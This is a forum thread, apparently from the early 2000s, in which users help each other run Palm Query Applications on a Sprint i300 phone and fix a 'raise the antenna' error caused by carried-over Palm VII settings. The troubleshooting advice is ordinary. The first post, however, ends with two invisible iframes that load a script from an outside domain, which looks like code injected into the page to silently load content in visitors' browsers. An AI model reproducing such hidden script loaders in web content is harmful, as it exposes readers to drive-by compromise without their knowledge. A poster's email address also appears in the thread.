+ Reply to Thread

Question running PQAs

Surprised there isn't a single thread on PQAs..
    Has anyone been able to use PQAs on the i300? The I300 keeps prompting me to "raise the antenna" (the Palm VII antenna, I suppose) when I try to submit PQA queries. Please help if you have been able to run PQAs successfully. Thanks. - Charlie<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

did you upgrade from a palm VII?

my phone did the same thing initially....

goto Preferences, system, connection...

make sure its set on Wireless CDMA Modem...

Brooks

Running PQA's

Can you run the email PQA's such as Thin Air Mail, iHopper etc. These don't have SMTP problems.
    Peter

Administrator

Arrow

yes you can run those...
    i am running mobilemail right now instead of those apps...

the i300 runs pqa's with no problem... avantgo, yahoo.pqas, aol, etc....

Wireless web?

So does the phone use the PCS Wireless Web when you use a pqa?

yes...

Brooks

Sounds like it behaves like a pqa on any Palm device. It goes to the network settings & dials up whatever service is selected. It would go to another ISP besides Wireless Web if that was selected. I started a new thread about how the iMessenger app uses the Wireless Web. I can't find any other info on this other than what's in the manual so far.

right, sprint doesn't care if you use them as an ISP or someone else, the call will still be a "data" call..... meaning, you better have the wireless web option on your plan, otherwise you'll be billed by the minute...

Brooks

Lightbulb

I have been running several PQAs without any problems. I am guessing that, as PQAs were designed for the PalmVII, that this is their way of asking you to establish a wireless connection.

Since mine do not do that, but rather initiate a call automatically when and if they need to, I am guessing that you have changed some of your wireless settings. Under Preferences, have a look under "Network". On my I300, I have the following settings: My Service is set to Sprint PCS, my username is "web" and my connection is "Wireless CDMA Modem". Next look under "Connection". Choose "Wireless CDMA Modem" and touch Edit. Make sure that your Connection Method is set to "Data on Air to Modem".

To my (computer-dweeb) mind, that should tell the PQAs to get their data through a wireless modem call. Good Luck.
    Last edited by Adam17; 12-06-2001 at 05:23 PM.

UserName for setting up PQA's

I noted in your post your username is set to "web". Was that your choice of a username or is that what it should be set to in everyone's i300 who wants to access PQA's.

Thanks

Peter
    pwc@itsa.ucsf.edu
    Peter

"web" is the userid for anyone using SprintPCS as their ISP. Just like the phone number is #2932. If you want to log on to a different ISP (e.g. Earthlink, AT&T, etc.) you simply use their phone #, userid, and password.

Good Luck!

If you're getting "Raise the antenna" error messages, you've probably dropped an existing Palm VII backup onto the I300, resulting in default settings being carried over for the CDPD modem and network that the Palm VII works off of that do not exist on the Sprint PCS network.

Delete any .PQAs on your I300 hundred and reload them using the Install Tool; make sure you're using the Sprint PCS network connection using the #2932 dialup and your problem will disappear.

Question palm VII programs

Help! I synced my I300 to load all my Palm VII programs, but all of them that utilize the wireless feature of the Palm VII don't work on the I300. I always get the message telling me to raise the antenna, as if the antenna on the Palm VII were down. How do I get these programs to work?

wow. First, don't sync your i300 with your palm VII files. Run a search for raised and you'll find very clear solutions.

Do a hard reset on your I300, delete the save preferences file in your backup folder, then sync. Or you can just install the web clipping apps from scratch...

Smile Palm VII programs

Thanks. I ran a search for "raised" and got 7 messages besides my own. I couldn't see that any talked about the solution. Could you give me a little more specific direction? I'm new at this. Thanks. I appreciate your help.

Sorry. I should have suggested a search on "raise." Look here.